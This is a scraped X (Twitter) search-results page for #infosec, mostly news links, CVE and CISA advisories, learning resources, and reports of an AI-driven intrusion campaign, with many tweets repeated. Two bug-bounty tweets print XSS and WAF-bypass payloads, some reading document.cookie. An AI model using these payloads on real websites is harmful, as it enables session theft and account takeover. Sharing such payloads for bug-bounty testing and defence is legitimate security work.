#infosec zoekresultaten

🔍 If you're new to OSINT (Open Source Intelligence), this video is for you. It walks you through how to get started in OSINT, tools to use, and practical tips to uncover information like a pro. Video: youtube.com/watch?v=H5Avj4… #infosec

mqst_'s tweet image. 🔍 If you're new to OSINT (Open Source Intelligence), this video is for you.

It walks you through how to get started in OSINT, tools to use, and practical tips to uncover information like a pro.

Video: youtube.com/watch?v=H5Avj4…

#infosec
mqst_'s tweet image. 🔍 If you're new to OSINT (Open Source Intelligence), this video is for you.

It walks you through how to get started in OSINT, tools to use, and practical tips to uncover information like a pro.

Video: youtube.com/watch?v=H5Avj4…

#infosec
mqst_'s tweet image. 🔍 If you're new to OSINT (Open Source Intelligence), this video is for you.

It walks you through how to get started in OSINT, tools to use, and practical tips to uncover information like a pro.

Video: youtube.com/watch?v=H5Avj4…

#infosec

Presentations about getting started with Linux kernel exploitation "Linux Kernel Exploitation for Beginners" by Kevin Massey: rvasec.com/slides/2025/Ma… "Control Flow Hijacking in the Linux Kernel" by Valeriy Yashnikov pt-phdays.storage.yandexcloud.net/Yashnikov_Vale… #Linux #infosec

0xor0ne's tweet image. Presentations about getting started with Linux kernel exploitation

"Linux Kernel Exploitation for Beginners" by Kevin Massey:
rvasec.com/slides/2025/Ma…

"Control Flow Hijacking in the Linux Kernel" by Valeriy Yashnikov
pt-phdays.storage.yandexcloud.net/Yashnikov_Vale…

#Linux #infosec
0xor0ne's tweet image. Presentations about getting started with Linux kernel exploitation

"Linux Kernel Exploitation for Beginners" by Kevin Massey:
rvasec.com/slides/2025/Ma…

"Control Flow Hijacking in the Linux Kernel" by Valeriy Yashnikov
pt-phdays.storage.yandexcloud.net/Yashnikov_Vale…

#Linux #infosec

Collection of notes for CTFs and red teaming. 📓 - github.com/0xsyr0/Awesome… #infosec #cybersec #bugbountips

0x0SojalSec's tweet image. Collection of notes for CTFs and red teaming. 📓 

- github.com/0xsyr0/Awesome… 

#infosec #cybersec #bugbountips

We added Fortinet FortiWeb path traversal vulnerability CVE-2025-64446 to our Known Exploited Vulnerabilities Catalog. Visit go.dhs.gov/Z3Q & apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec

CISACyber's tweet image. We added Fortinet FortiWeb path traversal vulnerability CVE-2025-64446 to our Known Exploited Vulnerabilities Catalog. Visit go.dhs.gov/Z3Q & apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec

Static analysis for Android apps based on the OWASP MASVS framework 🌟 - github.com/Cyber-Buddy/AP… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Static analysis for Android apps based on the OWASP MASVS framework 🌟

- github.com/Cyber-Buddy/AP…

#infosec #cybersec #bugbountytips

Tools and Techniques for Blue Team / Incident Response Collection of over 65 tools for blue teaming activities 📓 #infosec #cybersec #BugBountytips

0x0SojalSec's tweet image. Tools and Techniques for Blue Team / Incident Response Collection of over 65 tools for blue teaming activities 📓

#infosec #cybersec #BugBountytips

Collection of blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #cybersecurity #infosec

0xor0ne's tweet image. Collection of blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#cybersecurity #infosec
0xor0ne's tweet image. Collection of blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#cybersecurity #infosec

How to root the TP-Link Tapo C200 Rev.5 by getting a UART shell, dumping the flash, and decrypting the rootfs quentinkaiser.be/security/2025/… Credits @qkaiser #infosec #embedded

0xor0ne's tweet image. How to root the TP-Link Tapo C200 Rev.5 by getting a UART shell, dumping the flash, and decrypting the rootfs

quentinkaiser.be/security/2025/…

Credits @qkaiser

#infosec #embedded
0xor0ne's tweet image. How to root the TP-Link Tapo C200 Rev.5 by getting a UART shell, dumping the flash, and decrypting the rootfs

quentinkaiser.be/security/2025/…

Credits @qkaiser

#infosec #embedded

🔐 OWASP: Security Code Review Guide! Download PDF: owasp.org/www-project-co… #infosec

mqst_'s tweet image. 🔐 OWASP: Security Code Review Guide!

Download PDF: owasp.org/www-project-co…

#infosec

Short introduction to process injection in Linux akamai.com/blog/security-… #infosec #linux

0xor0ne's tweet image. Short introduction to process injection in Linux

akamai.com/blog/security-…

#infosec #linux

🚀You can now search for malware families, releases, techniques, and code snippets, including archives on Malware Gallery: malwaregallery.com #InfoSec #Malware #DFIR

DarkCoderSc's tweet image. 🚀You can now search for malware families, releases, techniques, and code snippets, including archives on Malware Gallery: malwaregallery.com 

#InfoSec #Malware #DFIR

Exploiting NVIDIA's GPU Linux drivers blog.quarkslab.com/nvidia_gpu_ker… Excellent blog post by Robin Bastide (@quarkslab) #infosec

0xor0ne's tweet image. Exploiting NVIDIA's GPU Linux drivers

blog.quarkslab.com/nvidia_gpu_ker…

Excellent blog post by Robin Bastide (@quarkslab)

#infosec
0xor0ne's tweet image. Exploiting NVIDIA's GPU Linux drivers

blog.quarkslab.com/nvidia_gpu_ker…

Excellent blog post by Robin Bastide (@quarkslab)

#infosec

🎉 Just earned my Fortinet Certified Fundamentals in Cybersecurity! Ready to tackle real-world security 🔐🖥️💪 challenges, thanks for the tools and training, @Fortinet! #Cybersecurity #Fortinet #Infosec

Iwuoha_Daniel01's tweet image. 🎉 Just earned my Fortinet Certified Fundamentals in Cybersecurity! Ready to tackle real-world security 🔐🖥️💪 challenges, thanks for the tools and training, @Fortinet!
#Cybersecurity #Fortinet #Infosec

Cloudflare WAF Bypass → XSS💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript​:prompt(404)">XSS-Click</00>--%20// #BugBounty #infosec #bugbountytips

viehgroup's tweet image. Cloudflare WAF Bypass → XSS💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: 

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript​:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#BugBounty #infosec #bugbountytips

Anthropic disclosed the first AI-run intrusion campaign, with Claude Code autonomously driving the attack workflow. This marks a shift to AI directly executing attacks. How it happened + how to prepare: 🔗 bit.ly/48caViq #cybersecurity #AIsecurity #infosec

SecurityTube's tweet image. Anthropic disclosed the first AI-run intrusion campaign, with Claude Code autonomously driving the attack workflow. This marks a shift to AI directly executing attacks. 

How it happened + how to prepare: 🔗 bit.ly/48caViq

#cybersecurity #AIsecurity #infosec

Anthropic disclosed the first AI-run intrusion campaign, with Claude Code autonomously driving the attack workflow. This marks a shift to AI directly executing attacks. How it happened + how to prepare: 🔗 bit.ly/4ploFyf #cybersecurity #AIsecurity #infosec

ine's tweet image. Anthropic disclosed the first AI-run intrusion campaign, with Claude Code autonomously driving the attack workflow. This marks a shift to AI directly executing attacks. 

How it happened + how to prepare: 🔗 bit.ly/4ploFyf

#cybersecurity #AIsecurity #infosec

Anthropic disclosed the first AI-run intrusion campaign, with Claude Code autonomously driving the attack workflow. This marks a shift to AI directly executing attacks. How it happened + how to prepare: 🔗 bit.ly/4pfMMhB #cybersecurity #AIsecurity #infosec

INEsecurity's tweet image. Anthropic disclosed the first AI-run intrusion campaign, with Claude Code autonomously driving the attack workflow. This marks a shift to AI directly executing attacks. 

How it happened + how to prepare: 🔗 bit.ly/4pfMMhB

#cybersecurity #AIsecurity #infosec

Cloud Break: IoT Devices Open to Silent Takeover Via Firewalls: ift.tt/CobGx5h by darkreading #infosec #cybersecurity #technology #news


W3 Total Cache < 2.8.13 suffers command injection (CVE‑2025‑9501); a crafted comment can run PHP and take over the site. >1 M WP sites at risk – update to 2.8.13 now and scan comments. thecyberexpress.com/w3-total-cache… #infosec #CVE2025-9501


Regular assessments should be conducted at least annually or whenever significant changes occur (e.g., system updates, new deployments, or security incidents). Read more 👉 lttr.ai/AlKtq #Security #Infosec #Audit


An update that solves one vulnerability can now be installed. # itextpdf5.5.13.41.1 on GA media Announcement ID: openSUSESU2025:157391 Rating: moderate CrossReferences: * CVE2... #OpenSUSE #Linux #infosec #opensource #linuxsecurity tinyurl.com/27gvqqlo

LS_Advisories's tweet image. An update that solves one vulnerability can now be installed. # itextpdf5.5.13.41.1 on GA media Announcement ID: openSUSESU2025:157391 Rating: moderate CrossReferences: * CVE2... #OpenSUSE #Linux #infosec #opensource #linuxsecurity tinyurl.com/27gvqqlo

Massive DDoS attack on Azure—500K+ IPs firing off. Full story here: techradar.com/pro/security/m… We’re witnessing a new frontier: AI-augmented attacks vs. AI-hardened defences. @DanielMiessler @kimzetter @SwiftOnSecurity #Infosec #AIsecurity


Fortinet released patches for a newly exploited FortiWeb zero-day (CVE-2025-58034) that allows authenticated attackers to run unauthorized code via OS command injection. Via @BleepinComputer bleepingcomputer.com/news/security/… #hacking #infosec #cybersecurity


Can a Global, Decentralized System Save CVE Data?: ift.tt/C0YSijV by darkreading #infosec #cybersecurity #technology #news


🛡️ We added Fortinet FortiWeb OS command code injection vulnerability CVE-2025-58034 to our Known Exploited Vulnerabilities Catalog. Visit go.dhs.gov/Z3Q & apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec

CISACyber's tweet image. 🛡️ We added Fortinet FortiWeb OS command code injection vulnerability CVE-2025-58034 to our Known Exploited Vulnerabilities Catalog. Visit go.dhs.gov/Z3Q &amp;amp; apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec

Build the fortress 🛡️ Become a Cybersecurity Engineer with #EricReedLive 🎓 Certs: Security+, CySA+, CISSP 💵 Salary: $100K+ 👉 hubs.li/Q03Tr7Xk0 #CyberEngineer #Infosec #CyberTraining

ericreedlive's tweet image. Build the fortress 🛡️
Become a Cybersecurity Engineer with #EricReedLive
🎓 Certs: Security+, CySA+, CISSP
💵 Salary: $100K+
👉 hubs.li/Q03Tr7Xk0

#CyberEngineer #Infosec #CyberTraining

CVE-2025-12367: The SiteSEO – SEO Simplified plugin for WordPress is vulnerable to Missing Authorization in versi... | CVSS 4.3 | nvd.nist.gov/vuln/detail/CV… #CVE #InfoSec #Tech #Vuln


Collection of notes for CTFs and red teaming. 📓 - github.com/0xsyr0/Awesome… #infosec #cybersec #bugbountips

0x0SojalSec's tweet image. Collection of notes for CTFs and red teaming. 📓 

- github.com/0xsyr0/Awesome… 

#infosec #cybersec #bugbountips

Bypass WAF . . "><?/script>"><--<img+src= "><svg/onload?=alert(document.cookie)>> --!> . "-->""/>0xr3dhunt</script><deTailS open x=">" ontoggle=(co\u006efirm)``>" . "-->""/>0xr3dhunt</script><deTailS open x=">" ontoggle=(co\u006efirm(document.cookie))``>" #infosec #bugbountytips

viehgroup's tweet image. Bypass WAF
.
.
&quot;&amp;gt;&amp;lt;?/script&amp;gt;&quot;&amp;gt;&amp;lt;--&amp;lt;img+src= &quot;&amp;gt;&amp;lt;svg/onload?=alert(document.cookie)&amp;gt;&amp;gt; --!&amp;gt;
.
&quot;--&amp;gt;&quot;&quot;/&amp;gt;0xr3dhunt&amp;lt;/script&amp;gt;&amp;lt;deTailS open x=&quot;&amp;gt;&quot; ontoggle=(co\u006efirm)``&amp;gt;&quot;
.
&quot;--&amp;gt;&quot;&quot;/&amp;gt;0xr3dhunt&amp;lt;/script&amp;gt;&amp;lt;deTailS open x=&quot;&amp;gt;&quot; ontoggle=(co\u006efirm(document.cookie))``&amp;gt;&quot;

#infosec #bugbountytips
viehgroup's tweet image. Bypass WAF
.
.
&quot;&amp;gt;&amp;lt;?/script&amp;gt;&quot;&amp;gt;&amp;lt;--&amp;lt;img+src= &quot;&amp;gt;&amp;lt;svg/onload?=alert(document.cookie)&amp;gt;&amp;gt; --!&amp;gt;
.
&quot;--&amp;gt;&quot;&quot;/&amp;gt;0xr3dhunt&amp;lt;/script&amp;gt;&amp;lt;deTailS open x=&quot;&amp;gt;&quot; ontoggle=(co\u006efirm)``&amp;gt;&quot;
.
&quot;--&amp;gt;&quot;&quot;/&amp;gt;0xr3dhunt&amp;lt;/script&amp;gt;&amp;lt;deTailS open x=&quot;&amp;gt;&quot; ontoggle=(co\u006efirm(document.cookie))``&amp;gt;&quot;

#infosec #bugbountytips

🔐 OWASP: Security Code Review Guide! Download PDF: owasp.org/www-project-co… #infosec

mqst_'s tweet image. 🔐 OWASP: Security Code Review Guide!

Download PDF: owasp.org/www-project-co…

#infosec

🚀You can now search for malware families, releases, techniques, and code snippets, including archives on Malware Gallery: malwaregallery.com #InfoSec #Malware #DFIR

DarkCoderSc's tweet image. 🚀You can now search for malware families, releases, techniques, and code snippets, including archives on Malware Gallery: malwaregallery.com 

#InfoSec #Malware #DFIR

APT28’s Phantom Net Voxel operation. Technical analysis by @sekoia_io blog.sekoia.io/apt28-operatio… #infosec

0xor0ne's tweet image. APT28’s Phantom Net Voxel operation. Technical analysis by @sekoia_io

blog.sekoia.io/apt28-operatio…

#infosec

🎉 Just earned my Fortinet Certified Fundamentals in Cybersecurity! Ready to tackle real-world security 🔐🖥️💪 challenges, thanks for the tools and training, @Fortinet! #Cybersecurity #Fortinet #Infosec

Iwuoha_Daniel01's tweet image. 🎉 Just earned my Fortinet Certified Fundamentals in Cybersecurity! Ready to tackle real-world security 🔐🖥️💪 challenges, thanks for the tools and training, @Fortinet!
#Cybersecurity #Fortinet #Infosec

Exploiting NVIDIA's GPU Linux drivers blog.quarkslab.com/nvidia_gpu_ker… Excellent blog post by Robin Bastide (@quarkslab) #infosec

0xor0ne's tweet image. Exploiting NVIDIA&apos;s GPU Linux drivers

blog.quarkslab.com/nvidia_gpu_ker…

Excellent blog post by Robin Bastide (@quarkslab)

#infosec
0xor0ne's tweet image. Exploiting NVIDIA&apos;s GPU Linux drivers

blog.quarkslab.com/nvidia_gpu_ker…

Excellent blog post by Robin Bastide (@quarkslab)

#infosec

Fault injection for secure boot bypass and secret extraction targeting RP2350 usenix.org/system/files/w… #infosec

0xor0ne's tweet image. Fault injection for secure boot bypass and secret extraction targeting RP2350

usenix.org/system/files/w…

#infosec

🔍 If you're new to OSINT (Open Source Intelligence), this video is for you. It walks you through how to get started in OSINT, tools to use, and practical tips to uncover information like a pro. Video: youtube.com/watch?v=H5Avj4… #infosec

mqst_'s tweet image. 🔍 If you&apos;re new to OSINT (Open Source Intelligence), this video is for you.

It walks you through how to get started in OSINT, tools to use, and practical tips to uncover information like a pro.

Video: youtube.com/watch?v=H5Avj4…

#infosec
mqst_'s tweet image. 🔍 If you&apos;re new to OSINT (Open Source Intelligence), this video is for you.

It walks you through how to get started in OSINT, tools to use, and practical tips to uncover information like a pro.

Video: youtube.com/watch?v=H5Avj4…

#infosec
mqst_'s tweet image. 🔍 If you&apos;re new to OSINT (Open Source Intelligence), this video is for you.

It walks you through how to get started in OSINT, tools to use, and practical tips to uncover information like a pro.

Video: youtube.com/watch?v=H5Avj4…

#infosec

Loading...

Something went wrong.


Something went wrong.


United States Trends